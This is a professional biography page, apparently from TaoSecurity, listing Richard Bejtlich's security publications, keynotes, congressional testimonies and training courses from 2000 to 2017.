- On 30 September 2000 The Learning Channel aired a show called Best Kept Secrets of the US Military that featured the AFCERT (taped 19 May 2000). (.mpg, 49 MB)
- The inside cover of Network Intrusion Detection, 2nd Edition quotes Mr. Bejtlich regarding the usefulness of the book. This Amazon.com page features that quote, listed as "From the Inside Flap."
Reference: TaoSecurity Research
2015 and later:
- Please visit Academia.edu for Mr. Bejtlich's most recent research.
- Seven Tips for Small Business Security, in the Huffington Post, 18 June 2014
- Strategy, Not Speed: What Today's Digital Defenders Must Learn From Cybersecurity's Early Thinkers, for the Brookings Institution, 7 May 2014
- What Federal Cyber Breach Notifications Really Mean for Business, for the Brookings Institution, 25 March 2014
- Don't Underestimate Cyber Spies: How Virtual Espionage Can Lead to Actual Destruction in Foreign Affairs, 2 May 2013
- Become a Hunter in the targeted-threat-centric Information Security Magazine, July-August 2011 (.pdf)
- Directions in Incident Detection and Response (.pdf) in the January/February 2011 issue of IEEE Security and Privacy magazine
- Understanding the Advanced Persistent Threat in Information Security Magazine, July 2010
- Traffic Talk issues 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
- Snort Report issues 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22
- Keeping FreeBSD Applications Up-to-Date in BSD Magazine
- Keeping FreeBSD Up-To-Date: OS Essentials in BSD Magazine
- Computer Incident Detection, Response, and Forensics in CSO Online
- Tuning Snort, in the August 2006 Sys Admin magazine
- Network Security Monitoring: Beyond Intrusion Detection, in Volume 8, No. 4 of the IA Newsletter
- Keeping FreeBSD Up to Date, in the February 2006 Sys Admin magazine
- Engineering Disasters in the December 2005 issue of Information Security Magazine.
- Using Attack Responses to Improve Intrusion Detection
- Structured Traffic Analysis in the October 2005 (IN)SECURE magazine (.pdf)
- More Tools for Network Security Monitoring, in the February 2005 Sys Admin magazine
- Keeping FreeBSD Applications Up-To-Date, also published in the December 2004 and January 2005 issues of Daemon News.
- Keeping FreeBSD Up-To-Date, also published in the November 2004 issue of Daemon News.
- Sguil Installation Script
- Considering Convergence? .pdf, published as an Addison-Wesley-sponsored supplement to the November 2004 issue of Dr. Dobb's Journal
- Integrating the Network Security Model (.pdf, .ps), in the April 2004 Sys Admin magazine
- Simplicity and Awareness: Keys to Network Security for the World Markets Research Centre's Global InfoSecurity 2002 report. (The article is a bit formal, and features a small amount of creative editing by the WMRC staff. Mr. Bejtlich certainly didn't intend for "UNIX" to be defined as a "Uniplexed Information and Computer System!")
- Network Intrusion Detection of Third Party Effects, published 05 September 2000
- Interpreting Network Traffic: A Network Intrusion Detector's Look at Suspicious Events, originally published 28 October 1999
Reference: TaoSecurity News
- 2017
- Mr. Bejtlich led a podcast titled Threat Hunting: Past, Present, and Future, in early July 2017. He interviewed four of the original six GE-CIRT incident handlers. The audio is posted on YouTube. Thank you to Sqrrl for making the reunion possible.
- Mr. Bejtlich's latest book was inducted into the Cybersecurity Canon.
- Mr. Bejtlich is doing limited security consulting. See this blog post for details.
- 2016
- Mr. Bejtlich organized and hosted the Management track (now "Executive track") at the 7th annual Mandiant MIRCon (now "FireEye Cyber Defense Summit") on 29-30 November 2016.
- Mr. Bejtlich delivered the keynote to the 2016 Air Force Senior Leaders Orientation Conference at Joint Base Andrews on 29 July 2016.
- Mr. Bejtlich delivered the keynote to the FireEye Cyber Defense Live Tokyo event in Tokyo on 12 July 2016.
- Mr. Bejtlich delivered the keynote to the New Zealand Cyber Security Summit in Auckland on 6 May 2016.
- Mr. Bejtlich delivered the keynote to the Lexpo Summit in Amsterdam on 21 April 2016. Video posted here.
- Mr. Bejtlich discussed cyber security campaigns at the 2016 War Studies Cumberland Lodge Conference near London on 30 March 2016.
- Mr. Bejtlich offered a guest lecture to the Wilson Center Congressional Cybersecurity Lab on 5 February 2016.
- Mr. Bejtlich delivered the keynote to the SANS Cyber Threat Intelligence Summit on 4 February 2016. Slides and video available.
- 2015
- Mr. Bejtlich spoke on a panel at the DefenseOne Summit on 2 November 2015.
- Mr. Bejtlich spoke on a panel at the AEI Internet Strategy event on 27 October 2015.
- Mr. Bejtlich organized and hosted the Management track at the 6th annual Mandiant MIRCon on 13-14 October 2015.
- Mr. Bejtlich testified to the House Foreign Affairs Committee on 7 October 2015.
- Mr. Bejtlich testified to the House Armed Services Committee on 30 September 2015.
- Mr. Bejtlich delivered a keynote at the 2015 Army Cyber Institute Cyber Talks on 22 September 2015 in Washington, DC.
- Mr. Bejtlich delivered a keynote at the 2015 Security Onion Conference on 11 September 2015 in Augusta, GA.
- Mr. Bejtlich delivered a keynote at the 2015 World Services Group Conference on 10 September 2015 in New York, NY.
- Mr. Bejtlich delivered a keynote at the CoBank 2015 Communications Industry Executive Forum on 19 August 2015 in Colorado Springs, CO.
- Mr. Bejtlich delivered a keynote at the Black Hat USA 2015 CISO Summit on 4 August 2015 in Las Vegas, NV.
- Mr. Bejtlich participated in a panel hosted by AEI on 22 July 2015, with video.
- Mr. Bejtlich spoke on a panel at the Chatham House Cyber 2015 event, 2-3 July 2015 in London, UK.
- Mr. Bejtlich participated in a panel hosted by the National Journal on 24 June 2015.
- Mr. Bejtlich testified to the House Committee on Financial Services Subcommittee on Oversight and Investigations on 16 June 2015.
- Mr. Bejtlich spoke on a panel at the Cyber Summit USA on 3 June 2015.
- Mr. Bejtlich testified to the House Permanent Select Committee on Intelligence on 19 March 2015.
- Mr. Bejtlich testified to the House Oversight and Government Reform Subcommittee on Information Technology on 18 March 2015.
- Mr. Bejtlich testified to the House Energy and Commerce Committee on 3 March 2015.
- Mr. Bejtlich spoke on a panel at the Washington Business Journal cyber conference on 26 February 2015.
- Mr. Bejtlich spoke on a panel at the Wall Street Journal CIO Network conference on 3 February 2015.
- Mr. Bejtlich testified to the Senate Committee on Homeland Security and Government Affairs on 28 January 2015.
- 2014
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat Trainings 2014: 8-9 December 2014 / Potomac, MD.
- Mr. Bejtlich organized and hosted the Management track at the 5th annual Mandiant MIRCon on 8-9 October 2014.
- Mr. Bejtlich delivered the keynote address at the inaugural Security Onion conference on 12 September 2014 in Augusta, GA.
- Mr. Bejtlich delivered the keynote address (video) at the inaugural ArchC0n conference on 6 September 2014 in St Louis, MO.
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat USA 2014: 4-5 August 2014 / Las Vegas, NV.
- Mr. Bejtlich spoke at the US Cyber Crime Conference on 29 April 2014. Video online at YouTube.
- Mr. Bejtlich recorded a Webcast titled Defining and Justifying an Advanced Security Program for FireEye on 17 March 2014.
- Mr. Bejtlich participated in a podcast titled Ukraine Crisis, Target Breach, and Edward Snowden: What's Next for U.S. Cyber Policy? for the Brookings Institution on 13 March 2014.
- Mr. Bejtlich participated on a panel hosted by the Center for National Policy on Building a cybersecurity roadmap: A Monitor, Center for National Policy seminar on 12 February 2014.
- Mr. Bejtlich spoke about digital security at the Boston Infragard quarterly meeting on 11 February 2014.
- Mr. Bejtlich delivered a lecture on digital security at West Point on 15 January 2014.
- Mr. Bejtlich spoke about digital security at seminars supporting the DoD Minerva Initiative at MIT and Harvard Kennedy School on 7-8 January 2014.
- 2013
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat Seattle 2013: 9-10 December 2013 / Seattle, WA.
- Mr. Bejtlich offered a guest lecture on digital security at George Washington University on 23 November 2013.
- Mr. Bejtlich spoke about digital security at the Mid-Atlantic CIO Council on 21 November 2013.
- Mr. Bejtlich was a panelist at the Brookings Institution on 19 November 2013.
- Mr. Bejtlich offered several guest lectures on digital security at the Massachusetts Institute of Technology on 18 November 2013.
- Mr. Bejtlich was a panelist at the Atlantic Council on 15 November 2013.
- Mr. Bejtlich organized and hosted the Management track at the 4th annual Mandiant MIRCon on 5-6 November 2013.
- Mr. Bejtlich was a panelist at the Free Thinking Film Festival on 2 November 2013.
- Mr. Bejtlich offered the keynote at the Cyber Ark user conference on 30 October 2013.
- Mr. Bejtlich was a panelist at the Indiana University Center for Applied Cybersecurity Research on 21 October 2013.
- Mr. Bejtlich spoke at the national ISSA conference on 10 October 2013.
- Mr. Bejtlich was a panelist at the Politico Cyber 7 event on 8 October 2013.
- Mr. Bejtlich offered the keynote at the BSides Augusta 2013 conference on 14 September 2013.
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat USA 2013: 27-28 and 29-30 July 2013 / Las Vegas, NV.
- Mr. Bejtlich was a panelist at the Chatham House Cyber Security Conference in London, England on 10 June 2013.
- Mr. Bejtlich appeared in the documentary Hacked, first available 7 June 2013.
- Mr. Bejtlich was interviewed at the Center for National Policy, with video archived, on 15 May 2013.
- Mr. Bejtlich delivered a keynote at the IT Web Security Summit in Johannesburg, South Africa on 8 May 2013.
- Mr. Bejtlich was a panelist at The George Washington University and US News & World Report Cybersecurity Conference on 26 April 2013.
- Mr. Bejtlich testified to the House Committee on Foreign Affairs on 21 March 2013.
- Mr. Bejtlich testified to the House Committee on Homeland Security on 20 March 2013.
- Mr. Bejtlich testified to the Senate Armed Services Committee on 19 March 2013.
- Mr. Bejtlich shared his thoughts on the APT1 report with the Federalist Society on 12 March 2013. The conference call was recorded as Cybersecurity And the Chinese Hacker Problem - Podcast.
- 2012
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat Abu Dhabi 2012: 3-4 Dec / Abu Dhabi, UAE.
- Mr. Bejtlich spoke at a Mandiant breakfast event in Calgary, AB on 28 Nov 2012.
- Mr. Bejtlich spoke at AppSecUSA in Austin, TX on 26 Oct 2012. The talk Incident Response: Security After Compromise is posted as a video (42 min).
- Mr. Bejtlich organized and hosted the Management track at the 3rd annual Mandiant MIRCon on 17-18 October 2012.
- Mr. Bejtlich spoke at a SANS event in Baltimore, MD on 5 Oct 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event in Dallas, TX on 13 Sep 2012.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat USA 2012: 21-22 and 23-24 Jul / Las Vegas, NV.
- Mr. Bejtlich taught a compressed version of TCP/IP Weapons School 3.0 at a U.S. Cyber Challenge Summer Camp in Ballston, VA on 28 Jun 2012.
- Mr. Bejtlich participated on a panel titled Hackers vs Executives at the Forrester conference in Las Vegas on 25 May 2012.
- Mr. Bejtlich spoke at the Cyber Security for Executive Leadership: What Every CEO Should Know event in Raleigh, NC on 11 May 2012.
- Mr. Bejtlich participated on a panel titled SEC Cyber Security Guidelines: A New Basis for D&O Exposure? at the 8th Annual National Directors & Officers Insurance ExecuSummit in Uncasville, CT on 8 May 2012.
- Mr. Bejtlich delivered the keynote to the 2012 National Cyber Crime Conference in Norwood, MA on 30 Apr 2012.
- Mr. Bejtlich spoke at the FOSE conference on a panel discussing new attacks on 4 Apr 2012.
- Mr. Bejtlich testified to the US-China Economic and Security Review Commission on 26 Mar 2012.
- Mr. Bejtlich spoke at the Air Force Association CyberFutures conference (audio mp3) on 23 Mar 2012.
- Mr. Bejtlich delivered the keynote to the IANS Research Mid-Atlantic conference on 21 Mar 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event with Secretary Michael Chertoff in New York, NY on 15 Mar 2012.
- Mr. Bejtlich spoke to the Augusta, GA ISSA chapter on 8 Mar 2012.
- Mr. Bejtlich participated on a panel about digital threats at the RSA Executive Security Action Forum on 27 Feb 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event with Gen (ret.) Michael Hayden in Washington, DC on 22 Feb 2012.
- Mr. Bejtlich spoke at the ShmooCon Epilogue conference on 30 Jan 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event with Secretary Michael Chertoff in Houston, TX on 12 Jan 2012.
- 2011
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat Abu Dhabi 2011: 12-13 Dec / Abu Dhabi, UAE.
- Mr. Bejtlich organized and hosted the Management track at the 2nd annual Mandiant MIRCon on 5-6 November 2011.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0, 26-27 Oct 2011 in McLean, VA.
- Mr. Bejtlich offered the keynote at the HawaiianTel 2011 Business Security Conference on 7 Sep 2011 in Honolulu, HI.
- Mr. Bejtlich participated in a panel titled Why Bad Breaches Happen To Good Companies on 25 Aug 2011.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at USENIX Security: 8-9 Aug / San Francisco, CA.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat USA 2011: 30-31 Jul and 1-2 Aug / Las Vegas, NV.
- Mr. Bejtlich participated in the Attacking Cyber Security Marketecture panel at BSidesSanFrancisco: 1100-1145 15 Feb / San Francisco, CA. Video available at Livestream with the talk starting at 12:35.
- Mr. Bejtlich participated in a panel at the e10+ Experienced Security event at RSA Conference USA 2011: 0730-1200 14 Feb / San Francisco, CA.
- Mr. Bejtlich presented "Cooking the Cuckoo's Egg" at the DoJ Cybersecurity Conference: 1100-1145 08 Feb / Washington, DC.
- Mr. Bejtlich presented Building a Fortune 5 CIRT Under Fire (twice) and participated in an APT panel at DoD Cybercrime: 26 Jan 2011 / Atlanta, GA.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat DC 2011: 16-17 Jan 2011 / Arlington, VA.
- 2010
- Mr. Bejtlich presented to the TechTarget Emerging Threats forum on 16 Nov 2010 / New York, NY.
- Mr. Bejtlich participated in the MANDIANT MirCon Wrap-Up Webcast on 19 Oct 2010.
- Mr. Bejtlich spoke on the Incident Response Dream Team Panel at the first annual Mandiant MIRCon, 12-13 Oct 2010 / Alexandria, VA.
- Mr. Bejtlich offered a guest lecture on digital security at Loyola University Maryland on 11 Oct 2010.
- Mr. Bejtlich presented to the TechTarget Emerging Threats forum on 28 Sep 2010 / Seattle, WA.
- Mr. Bejtlich delivered the VizSec 2010 keynote on 14 Sep 2010, and then attended RAID 2010 15-17 Sep 2010 / Ottawa, Canada.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat USA 2010: 24-25 and 26-27 Jul 2010 / Las Vegas, NV.
- Mr. Bejtlich presented CIRT-Level Response to APT at SANS WhatWorks in Incident Response and Forensic Solutions 2010: 8-9 Jul 2010 / Washington, DC
- Mr. Bejtlich presented Building a Fortune 5 CIRT Under Fire at FIRST 2010 18 Jun 2010 / Miami, FL
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat Europe 2010: 12-13 Apr 2010 / Barcelona, Spain.
- Mr. Bejtlich offered a guest lecture on digital security at Georgetown University on 22 March 2010.
- Mr. Bejtlich offered a guest lecture on digital security at the United States Naval Academy on 2 March 2010.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat DC 2010: 31 Jan - 1 Feb 2010 / Arlington, VA.
- 2009
- Mr. Bejtlich organized and led the SANS WhatWorks in Incident Detection Summit 2009, 9-10 Dec 09 / Washington, DC.
- Mr. Bejtlich offered a keynote and participated in panels at DojoCon, 6-7 Nov 09 / MD
- Mr. Bejtlich offered a keynote and class at the Information Security Summit, 29-30 Oct 09 / Corporate College East, Warrensville Heights, OH.
- Mr. Bejtlich participated in a panel titled The Laws of Vulnerabilities at Black Hat USA 2009 on 29 July 2009.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat USA 2009: 25-26 and 27-28 July 2009 / Caesars Palace, Las Vegas, NV.
- Mr. Bejtlich delivered the keynote at the SANS WhatWorks Summit in Forensics and Incident Response 2009, 6-7 July 2009 / The Fairmont Washington, Washington, DC.
- Mr. Bejtlich offered a guest lecture on digital security at the United States Air Force Academy on 1 May 2009.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat Europe 2009 Training: 14-15 April 2009 / Moevenpick Hotel Amsterdam City Centre, Amsterdam, The Netherlands.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat DC 2009 Training: 16-17 February 2009 / Hyatt Regency Crystal City, Arlington, VA.
- Mr. Bejtlich presented Network Security Monitoring Using FreeBSD at DC BSDCon 2009, 6 February 2009 / Washington Marriott Wardman Park, Washington, DC.
- 2008
- Mr. Bejtlich delivered the keynote at the 1st ACM Workshop on Network Data Anonymization (NDA 2008), 31 October 2008 / Hilton Alexandria Mark Center, Alexandria, VA.
- Mr. Bejtlich offered a guest lecture on digital security at Johns Hopkins University on 20 October 2008.
- Mr. Bejtlich delivered the keynote on the second day of the SANS WhatWorks in Incident Response and Forensic Solutions Summit 2008, 13-14 October 2008 / Caesars Palace, Las Vegas, NV.
- Mr. Bejtlich taught TCP/IP Weapons School at Black Hat USA 2008 Training: 2-3 and 4-5 August 2008 / Caesars Palace, Las Vegas, NV
- Mr. Bejtlich provided the keynote at Detection of Intrusions and Malware & Vulnerability Assessment: 10-11 July 2008 / France Telecom R&D / Orange Labs, Issy les Moulineaux, near Paris, France
- Mr. Bejtlich taught Network Security Operations at TechnoSecurity 2008: 31 May 2008 / Myrtle Beach Marriott Resort, Myrtle Beach, SC
- Mr. Bejtlich taught TCP/IP Weapons School at Black Hat DC 2008: 18-19 February 2008 / Westin Hotel, Washington, DC
- 2007
- Mr. Bejtlich offered a guest lecture on digital security at George Mason University on 29 November 2007.
- Network Security Operations: 27-29 August 2007 / public 3 day class / Chicago, IL
- Mr. Bejtlich spoke to the Chicago Electronic Crimes Task Force and the Chicago Snort Users Group on 30 and 29 August 2007, respectively.
- Mr. Bejtlich taught Network Security Operations on 21-23 August 2007 / Cincinnati, OH
- Mr. Bejtlich taught TCP/IP Weapons School (layers 4-7) at USENIX Security 2007: 6-7 August 2007 / Boston, MA.
- Mr. Bejtlich taught TCP/IP Weapons School at Black Hat USA 2007: 28-29 and 30-31 July 2007 / Caesars Palace, Las Vegas, NV.
- USENIX 2007: 20-22 June 2007 / Network Security Monitoring and TCP/IP Weapons School (Layers 2-3) tutorials / Santa Clara, CA
- Mr. Bejtlich briefed GFIRST 2007: 25-26 June 2007 / Network Incident Response and Forensics (two half-day tutorials) and Traditional IDS Should Be Dead conference presentation / Orlando, FL
- Mr. Bejtlich taught TCP/IP Weapons School (Layers 2-3) and briefed Open Source Network Forensics at Techno Security 2007: 5-7 June 2007 / Myrtle Beach, SC.
- Mr. Bejtlich briefed Open Source Network Forensics at ISS World Spring 2007: 31 May 2007 / Washington, DC
- Mr. Bejtlich briefed Network Incident Response and Forensics at AusCERT 2007: 23-24 May 2007 / Gold Coast, Australia.
- Mr. Bejtlich taught Network Security Monitoring: 25 May 2007 / Sydney, Australia.
- Mr. Bejtlich briefed at CONFIDENCE 2007: 13 May 2007 / Krakow, Poland.
- Mr. Bejtlich briefed at ShmooCon: 24 March 2007 / Washington, DC; video here.
- 2006
- Mr. Bejtlich presented a special two evening training class, Enterprise Network Instrumentation, on 14-15 December 2006, at SANS CDI East 2006. More details are posted here.
- Mr. Bejtlich presented TCP/IP Weapons School Part 2 on 9-10 December 2006, after USENIX LISA in Washington, DC.
- Mr. Bejtlich taught days one and two of TCP/IP Weapons School on 3 and 4 December 2006 at USENIX LISA in Washington, DC. He also taught Network Security Monitoring with Open Source Tools on 8 December 2006.
- Mr. Bejtlich appeared on the Tenable Webinar at 1000 ET on Friday 17 November 2006.
- Mr. Bejtlich participated in the DE Communications Inside Job Webinar at 11 ET on Thursday 9 November 2006.
- Mr. Bejtlich spoke at the Net Optics Think Tank in Fairfax, VA on Tuesday, 26 September 2006 from 1215-1315.
- Mr. Bejtlich spoke at the 2006 FFIEC Information Technology Conference in Arlington, VA on Wednesday, 23 August 2006 from 0830-1000.
- Mr. Bejtlich taught TCP/IP Weapons School at USENIX Security 2006 in Vancouver, BC on 31 July and 1 August 2006.
- Mr. Bejtlich spoke at the 2006 FIRST Conference in Baltimore, MD on Friday, 30 June 2006 from 1500 to 1530.
- Mr. Bejtlich spoke at the 2006 Techno Security Conference in Myrtle Beach, SC on Tuesday, 6 June 2006. From 0800-0930 he presented Enterprise Network Instrumentation Fundamentals. From 1000-1200 he presented Enterprise Network Instrumentation: Advanced Topics. At 1530 he joined Ron Gula, Marcus Ranum, Ross Rogers, and Johnny Long for a security panel discussion.
- Mr. Bejtlich taught a one day course on Network Security Monitoring with Open Source Tools at the USENIX 2006 Annual Technical Conference in Boston, MA on Friday, 2 June 2006.
- Mr. Bejtlich offered a guest lecture at the University of Cambridge Computer Laboratory Security Group Seminar Series in Cambridge, UK, on Friday 19 May 2006 on network security monitoring.
- Mr. Bejtlich spoke at the 2006 Computer and Enterprise Investigations Conference in Lake Las Vegas, NV on Thursday, 4 May 2006 from 1400-1530 on Network Forensics.
- Mr. Bejtlich spoke at the US-CERT 2006 GFIRST Conference in Orlando, FL on Monday, 1 May 2006 from 1030-1200 on Network Incident Response.
- Mr. Bejtlich spoke at the Network Security 2006 Conference in Reston, VA on Monday, 17 April 2006 from 1845 to 1945.
- Mr. Bejtlich spoke at the 2006 Rocky Mountain Information Security Conference in Denver, CO on Wednesday, 5 April 2006 on Network Incident Response.
- Mr. Bejtlich spoke at the RSA Conference 2006 in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject was Traffic-Centric Incident Response and Forensics.
- Mr. Bejtlich spoke at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject was Network Security Monitoring with Sguil.
- Mr. Bejtlich delivered presentations on network incident response and network forensics at the 2006 DoD Cybercrime Conference in Palm Harbor, FL on 11 January 2006.
- 2005
- Mr. Bejtlich presented three full-day tutorials at USENIX LISA 2005 in San Diego, CA, from 6-8 December 2005. He taught network security monitoring, incident response, and forensics.
- Mr. Bejtlich spoke at the Cisco Fall 2005 System Engineering Security Virtual Team Meeting in San Jose, CA on 10 October 2005.
- Mr. Bejtlich spoke at the Net Optics Think Tank at the Hilton Santa Clara in Santa Clara, CA on 21 September 2005. He discussed network forensics, with a preview of material in his next book Real Digital Forensics.
- Mr. Bejtlich taught network security monitoring to security analysts from the Pentagon with Special Ops Security on 23 and 24 August 2005 in Rosslyn, VA.
- Mr. Bejtlich spoke at the InfraGard 2005 National Conference on 9 August 05 in Washington, DC on the basics of network forensics.
- Mr. Bejtlich taught a one day course on network incident response, with his forensics book as the background material, at USENIX Security 05 on 1 August 2005 in Baltimore, MD.
- Mr. Bejtlich taught a one day course on network security monitoring, with his NSM book as the background material, at USENIX Security 05 on 31 July 2005 in Baltimore, MD.
- Mr. Bejtlich offered a guest lecture on digital security at George Washington University on 23 June 2005.
- Mr. Bejtlich spoke at the Techno Security 2005 conference on 13 June 2005 in Myrtle Beach, CA. He was invited by Tenable Security to appear at their evening social event.
- Mr. Bejtlich spoke at the Net Optics Think Tank on 18 May 2005 in Sunnyvale, CA.
- Mr. Bejtlich presented Keeping FreeBSD Up-To-Date and More Tools for Network Security Monitoring at BSDCan 2005 on 13 May 2005.
- Mr. Bejtlich spoke to the Pentagon Security Forum on 19 April 2005.
- Mr. Bejtlich taught a one day course on network security monitoring, with his book as the background material, at USENIX 05 on 14 April 2005 in Anaheim, CA.
- Mr. Bejtlich spoke to the Government Forum of Incident Response and Security Teams (GFIRST) on 5 April 2005 in Orlando, FL.
- Mr. Bejtlich spoke to the Information Systems Security Association of Northern Virginia (ISSA-NoVA) on 17 February 2005 in Reston, VA.
- Mr. Bejtlich spoke at the 2005 DoD Cybercrime Conference on 13 January 2005 in Palm Harbor, FL.
- 2004
- Mr. Bejtlich spoke to the DC Systems Administrators Guild (DC-SAGE) on 21 October 2004 about Sguil.
- Mr. Bejtlich spoke to the DC Linux Users Group on 15 September 2004 about Sguil.
- Mr. Bejtlich spoke to the High Technology Crime Investigation Association International Conference and Expo 2004 on 13 September 2004 in Washington, DC about Sguil.
- Mr. Bejtlich taught a one day course on network security monitoring, with his first book as the background material, at USENIX Security 04 on 9 August 2004 in San Diego.
- Mr. Bejtlich spoke to the DC Snort User's Group on 24 Jun 2004 about Sguil.
- Mr. Bejtlich presented Network Security Monitoring with Sguil (.pdf) at BSDCan on 14 May 2004.
- Mr. Bejtlich spoke to the SANS Local Mentor program in northern Virginia for two hours on 11 May 2004 about NSM using Sguil. Joe Bowling invited him.
- Mr. Bejtlich gave a lightning talk demo of Sguil at CanSecWest 04 on 22 April 2004.
- 2003
- Mr. Bejtlich spoke to ISSA-CT about network security monitoring on 9 December 2003.
- Mr. Bejtlich taught Foundstone's Ultimate Hacking Expert class at Black Hat Federal 2003 in Tyson's Corner, 29-30 September 2003.
- Mr. Bejtlich recorded a second webcast on network security monitoring for SearchSecurity.com. He posted the slides here.
- Mr. Bejtlich taught the first day of Foundstone's Ultimate Hacking Expert class at Black Hat USA 2003 Training in Las Vegas on 28 July 2003.
- Mr. Bejtlich spoke on 21 July 2003 in Washington, DC at the SANS NIAL conference.
- Mr. Bejtlich discussed digital security in Toronto on 13 March 2003 and in Washington, DC on Tuesday, 25 March 2003 at the request of Watchguard.
- Mr. Bejtlich taught days four, five, and six of the SANS intrusion detection track in San Antonio, Texas from 28-30 January 2003.
- 2002
- Mr. Bejtlich recorded a webcast on network security monitoring (PDF slides) with his friend Bamm Visscher for SearchSecurity.com and answered questions submitted by listeners. A SearchSecurity editor commented on the talk as well.
- Mr. Bejtlich helped teach Foundstone's Ultimate Hacking class at Black Hat USA 2002 Training in Las Vegas on 29-30 July 2002.
- Mr. Bejtlich taught days one, two, and three of the SANS intrusion detection track in San Antonio, Texas from 15-17 July 2002.
- Mr. Bejtlich taught day four of the SANS intrusion detection track in Toronto, Ontario on 16 May 2002.
- On 11 April 2002 Mr. Bejtlich briefed the South Texas ISSA chapter on Snort.
- Mr. Bejtlich helped teach day four of the SANS intrusion detection track in San Antonio, Texas on 14 March 2002 after Marty Roesch was unable to teach the class.
- 2000-2001
- On 24-25 October 2001 Mr. Bejtlich spoke to the Houston InfraGard chapter at their 2001 conference.
- In August and September 2001 Mr. Bejtlich briefed analysts at the AFCERT on Interpreting Network Traffic.
- On 19 October 2000 Mr. Bejtlich was invited back to speak at the SANS Network Security 2000 Technical Conference.
- During 14-16 August 2000 Mr. Bejtlich participated in the Cyber Summit 2000 sponsored by the Air Intelligence Agency. Mr. Bejtlich was a captain in the AFCERT. You will find him in the middle of this picture.
- In June 2000 Mr. Bejtlich signed a letter protesting the Council of Europe draft treaty on Crime in Cyberspace.
- In June 2000 Mr. Bejtlich briefed FIRST on third party effects. This predated CAIDA's 2001 USENIX "backscatter" paper.
- On 25 March 2000 Mr. Bejtlich presented Interpreting Network Traffic: A Network Intrusion Detector's Look at Suspicious Events at the SANS 2000 Technical Conference.